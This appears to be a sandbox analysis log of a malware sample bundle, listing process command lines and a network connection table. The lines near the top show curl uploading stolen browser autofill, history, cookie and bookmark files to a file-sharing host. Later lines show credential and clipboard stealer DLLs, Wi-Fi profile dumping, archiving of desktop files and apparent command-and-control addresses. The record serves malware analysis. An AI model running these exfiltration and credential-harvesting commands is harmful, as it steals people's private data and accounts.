curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5412,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5136,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5032 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\random.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=4400,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3420,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4440 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5052,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4896 /prefetch:1
C:\Windows\system32\calc.exe
calc.exe
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5072,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3836 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Out2.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\neptuno.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\VmManagedSetup.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ssg.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\xx.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\cx.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AsyncClient.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\dropper.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5080,i,12615087829845560238,4755947071874416006,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4544 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\null.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe"
C:\Program Files\Microsoft Office\root\Office16\Winword.exe
"C:\Program Files\Microsoft Office\root\Office16\Winword.exe" /n "C:\Windows\System32\drivers\etc\hosts"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe"
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Windows\system32\wscript.EXE
C:\Windows\system32\wscript.EXE //B "C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.js"
C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr
"C:\Users\Admin\AppData\Local\Secure360 Innovations\Securify360.scr" "C:\Users\Admin\AppData\Local\Secure360 Innovations\V"
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe
"C:\Users\Admin\AppData\Local\Temp\10000840101\ssg.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-http2 --use-spdy=off --disable-quic
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfbd3cc40,0x7ffdfbd3cc4c,0x7ffdfbd3cc58
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\565375082730_Desktop.zip' -CompressionLevel Optimal
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3280,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3264 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1816,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3676 /prefetch:3
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1820,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3712 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2656,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3860 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2648,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=3972 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4396 /prefetch:1
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3872,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4720 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe
"C:\Users\Admin\AppData\Local\Temp\10000850101\update.exe"
C:\Windows\system32\audiodg.exe
"C:\Windows\system32\audiodg.exe"
C:\Windows\system32\msiexec.exe
"C:\Windows\system32\msiexec.exe"
C:\Windows\system32\svchost.exe
"C:\Windows\system32\svchost.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll, Main
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4916,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=4912 /prefetch:1
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --disable-quic --disable-http2 --no-appcompat-clear --field-trial-handle=1904,i,16624922943150151440,2377111403454914617,262144 --variations-seed-version=20241213-130109.462000 --mojo-platform-channel-handle=5028 /prefetch:8
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b735857d-e559-49b6-b15c-b9318ed9a008} 6780 "\\.\pipe\gecko-crash-server-pipe.6780" gpu
C:\Users\Admin\AppData\Roaming\new.exe
C:\Users\Admin\AppData\Roaming\new.exe
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\explorer.exe
explorer.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cxcs.microsoft.net | udp |
| DE | 23.42.30.141:443 | cxcs.microsoft.net | tcp |
| US | 95.101.136.201:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 201.136.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| NL | 85.31.47.154:80 | 85.31.47.154 | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| TH | 45.141.26.234:80 | 45.141.26.234 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| AE | 62.60.226.24:80 | 62.60.226.24 | tcp |
| US | 151.101.2.49:443 | urlhaus.abuse.ch | tcp |
| RU | 176.113.115.33:80 | 176.113.115.33 | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| TH | 185.84.161.186:80 | 185.84.161.186 | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 69.49.234.173:443 | haramb.net | tcp |
| CN | 101.200.220.118:8090 | tcp | |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| TH | 45.141.26.234:7000 | tcp | |
| TH | 185.84.161.186:80 | 185.84.161.186 | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| CN | 47.92.31.237:8088 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | cxlugg.sbs | udp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 8.8.8.8:53 | condedqpwqm.shop | udp |
| US | 172.67.69.226:443 | ipapi.co | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 104.16.124.96:443 | www.cloudflare.com | tcp |
| US | 172.67.69.226:443 | ipapi.co | tcp |
| US | 104.16.124.96:443 | www.cloudflare.com | tcp |
| US | 172.67.69.226:443 | ipapi.co | tcp |
| US | 104.16.124.96:443 | www.cloudflare.com | tcp |
| US | 172.67.69.226:443 | ipapi.co | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| CN | 120.24.38.217:4433 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| NL | 104.110.240.59:443 | www.bing.com | tcp |
| NL | 104.110.240.59:443 | www.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| GB | 2.18.27.76:443 | r.bing.com | tcp |
| HK | 47.238.103.180:54322 | 47.238.103.180 | tcp |
| IE | 20.190.159.75:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | 180.103.238.47.in-addr.arpa | udp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| FR | 172.217.18.195:443 | recaptcha.net | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| CO | 181.131.217.244:30203 | 3diciembre.con-ip.com | tcp |
| FR | 172.217.18.195:443 | recaptcha.net | udp |
| US | 8.8.8.8:53 | 170.201.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.20.217.172.in-addr.arpa | udp |
| FR | 172.217.20.164:443 | www.google.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| RU | 185.81.68.147:443 | 185.81.68.147 | tcp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:1912 | tcp | |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CO | 181.131.217.244:1515 | 3diciembre.con-ip.com | tcp |
| CN | 47.94.168.145:9999 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| GB | 104.86.110.120:443 | tcp | |
| US | 20.42.65.90:443 | browser.pipe.aria.microsoft.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| US | 67.205.154.243:35184 | tcp | |
| NL | 104.110.240.59:443 | r.bing.com | tcp |
| TH | 85.203.4.238:80 | 85.203.4.238 | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| US | 74.125.34.46:443 | www.virustotal.com | tcp |
| FR | 172.217.18.195:443 | recaptcha.net | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CO | 181.131.217.244:1515 | 3diciembre.con-ip.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| US | 67.205.154.243:35184 | tcp | |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.113:443 | r.bing.com | tcp |
| NL | 104.110.240.113:443 | r.bing.com | tcp |
| NL | 104.110.240.59:443 | r.bing.com | tcp |
| NL | 104.110.240.59:443 | r.bing.com | tcp |
| CN | 183.57.21.131:8095 | tcp | |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| NL | 104.110.240.131:443 | www.bing.com | tcp |
| RU | 176.122.27.90:9999 | 176.122.27.90 | tcp |
| CN | 101.37.34.164:9000 | tcp | |
| RU | 176.122.27.90:8888 | tcp | |
| US | 8.8.8.8:53 | 90.27.122.176.in-addr.arpa | udp |
| DE | 193.161.193.99:35184 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| N/A | 127.0.0.1:51822 | tcp | |
| US | 8.8.8.8:53 | 24.19.67.172.in-addr.arpa | udp |
| US | 67.205.154.243:35184 | tcp | |
| DE | 193.161.193.99:35184 | tcp | |
| CO | 181.131.217.244:1515 | 3diciembre.con-ip.com | tcp |
| US | 8.8.8.8:53 | eveezueigohehla.co | udp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| CN | 101.35.141.80:8443 | tcp | |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 67.205.154.243:35184 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | JzyWtlVaDZyw.JzyWtlVaDZyw | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | cxlugg.sbs | udp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| DE | 193.161.193.99:35184 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 23.42.16.93:443 | steamcommunity.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.123.112.45.in-addr.arpa | udp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| N/A | 127.0.0.1:52859 | tcp | |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| NL | 92.123.77.34:80 | r11.o.lencr.org | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.45.26.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.77.123.92.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | eveezueigohehla.co | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| N/A | 127.0.0.1:52868 | tcp | |
| N/A | 127.0.0.1:52877 | tcp | |
| N/A | 127.0.0.1:52882 | tcp | |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 67.205.154.243:35184 | tcp | |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| N/A | 127.0.0.1:52886 | tcp | |
| N/A | 127.0.0.1:52889 | tcp | |
| US | 162.159.128.233:443 | discord.com | tcp |
